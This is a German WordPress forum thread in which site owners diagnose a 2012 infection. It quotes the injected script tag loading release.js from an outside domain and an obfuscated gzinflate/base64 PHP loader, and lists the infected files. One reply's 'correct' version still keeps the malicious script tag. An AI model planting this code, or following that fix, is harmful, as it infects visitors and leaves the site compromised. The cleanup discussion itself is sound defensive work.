Code-Schnipsel auf der Seite (; charset=UTF-8" /> )

  • Hallo!

    Ich weiß nicht, woher das kommt, aber seit ein paar Minuten habe ich oben links ein Stückchen Quellcode auf der Seite:

    http://www.reziratte.de

    Ich habe nichts aktualisiert, nichts weiter an der Seite umgebaut, und dieses Problem zuvor noch nie gehabt.
    Allerdings hätte ich es gerne wieder weg.
    Ich weiß nur nicht, wie...?

    VG
    pelzi

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Im Head ist dieser fehlerhafte code:

    Code
    <meta http-equiv="Content-Type" content="text/html<script type="text/javascript" src="[URL="http://forum.wpde.org/view-source:http://www.daysofyorr.com/release.js"]http://www.daysofyorr.com/release.js[/URL]"></script>; charset=UTF-8" />

    Mein Virenscanner meldet einen Trojaner !
    freshnewstoday.com/z/xmlview

  • Guck dir mal deinen <head> Bereich an....

    HTML
    <head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html<script type="text/javascript" src="http://www.daysofyorr.com/release.js"></script>; charset=UTF-8" />

    Das script muss da raus.

    So gehört es:

    HTML
    <head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <script type="text/javascript" src="http://www.daysofyorr.com/release.js"></script>
  • Mir ist das jetzt ja gerade sehr peinlich, so blöd zu fragen, aber wo sehr ihr das?
    :oops:

    bzw

    Wenn ich mir mit Rechtsklick von der Seite aus den Quelltext anzeigen lasse, sehe ich es auch. Aber ich finde einfach nicht, wo ich das ändern muss...

    Einmal editiert, zuletzt von pelznase (29. Februar 2012 um 13:20)

  • Dachte ich mir, dass es ähnlich ist. Stellt sich nur die Frage, wie ich den los werde?

    An sämtlichen Social-Buttons und Scripten hockt der appendix
    "&sfgdata=" dran, das schaut auch nicht wirklich gut aus... :(

    Eine Idee, woran es liegen könnte?

  • Schön zu sehen, dass mein Vorgehen deinem gleicht. Hätte den Artikel aber sehr gerne bereits heute Nachmittag entdeckt... ;)

    Aber so finden ihn hoffentlich andere, die auch davon betroffen sind.

  • Ja groß was eingefangen!!!

    Ging mir leider genauso... ich habe heute schätzungsweise 7-9h damit gebracht elendig viel Schadcode aus zugegebenermaßen recht vielen Seiten zu entfernen.

    Was es ist? Weiß ich leider auch noch nicht... habe erstmal alles entfernt bevor ich mit der Recherche anfange... daher bin ich jetzt hier gelandet.

    Aber das Script ist sicher nicht das Einzige!

    Es handelt sich ja um Wordpress... bitte mal an folgenden Orten prüfen:

    WP_root/index.php
    WP_root/wp-header.php
    WP_root/wp-login.php
    (und eine neue php Datei dürfte hier auch drin liegen. Name Variiert (session.php, q.php, p.php, phdinfo.php,favicon.php...) aber Änderungsdatum nur einige Sekunden neben den anderen hier genannten)

    WP_root/wp-admin/admin-footer.php
    WP_root/wp-admin/admin-header.php
    WP_root/wp-admin/custom-header.php
    WP_root/wp-admin/index.php
    WP_root/wp-admin/menu-header.php

    WP_root/network/wp-admin/index.php

    WP_root/wp-content/index.php

    WP_root/wp-content/plugins/index.php
    (gegebenenfalls auch einige Pluginordner betroffen, jeweils die index Dateien)
    WP_root/wp-content/themes/index.php

    WP_root/wp-content/themes/THEMEORDNER/index.php
    WP_root/wp-content/themes/THEMEORDNER/page.php
    WP_root/wp-content/themes/THEMEORDNER/header.php
    WP_root/wp-content/themes/THEMEORDNER/footer.php

    WP_root/wp-includes/theme-compat/header.php
    WP_root/wp-includes/theme-compat/footer.php

    so das sind jetzt alles Standarddateien der WP-Installationen. Je nach Plugins und Themes kann da noch mehr da zu kommen. Alle diese Dateien dürften ein Datum der letzten Änderung von gestern oder heute Nacht haben nehme ich an... jedenfalls liegt die Änderungszeit nur Sekunden auseinander.

    Und in alle Dateien wurde feinsäuberlich ein Schadcode eingeschrieben:

    Code
    #b58b6f#
    echo(gzinflate(base64_decode("JctRCoAgDADQq8gO4P5DvcuwRUmhbKPl7fvw98FLWuUaFmwOzmD8GTZ6aSkElZrhNBsborvHnab2Y3aRWPuDwjeTcmwKJeFK5Qc=")));
    #/b58b6f#

    (vielleicht variiert da auch der Inhalt)

    ja und je nach dem was noch so auf dem Server liegt sind wahrscheinlich alle Ordner betroffen. Also in jedem Falle mehrere Wordpressinstallationen aber ggf auch alle anderen php und html Dateien (meist irgendwas mit header, index, etc im Namen) In HTML Dateien wird übrigens direkt:

    Code
    <!--b58b6f--><script type="text/javascript" src="http://www.daysofyorr.com/release.js"></script><!--/b58b6f-->

    hineingeschrieben.

    So was das ganze macht?! Keine Ahnung, sicher nichts gutes s. Trojanerwarnung. Dsa Löschen der Codes ist sicher auch nicht das Ende vom Lied (ich Sitze auf meinem Webspace schon recht lange mit solchen Problemen... das kommt immer mal wieder in anderer Form)


    Vermutung: Das ganze hat sein Einfallstor in der thumb.php oder timthumb.php ich würde also stark vermuten, dass zumindest einer der Blogs auf dem Server ein Theme nutzt, welches timthumb integriert hat. Ihr könnt das ja bitte bestätigen oder widerlegen... die Ursache wüsste ich nämlich auch gern. Habe sie selbst noch nicht gefunden...

  • oh da hat jemand während des schreibens nen guten Link gepostet... aber ja Ergebnisse sind die selben :(

    Mal sehen ob noch was durchsickert, wie gefährlich der Trojaner ist... also alle Passwörter, die ich besitze zu ändern könnte mich schonmal Wochen kosten...

  • [COLOR="Red"][SIZE="5"]Entfernt bitte die Links zu euren Seiten, solange sie nicht vollständig gesäubert sind! Danke![/SIZE][/COLOR]

    Wenn ihr die URLs hier bekannt geben wolllt, dann macht das als normalen Text, also ohne http://www.

    Beispiel:
    Statt http://www.example.com bitte nur example.com schreiben.

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!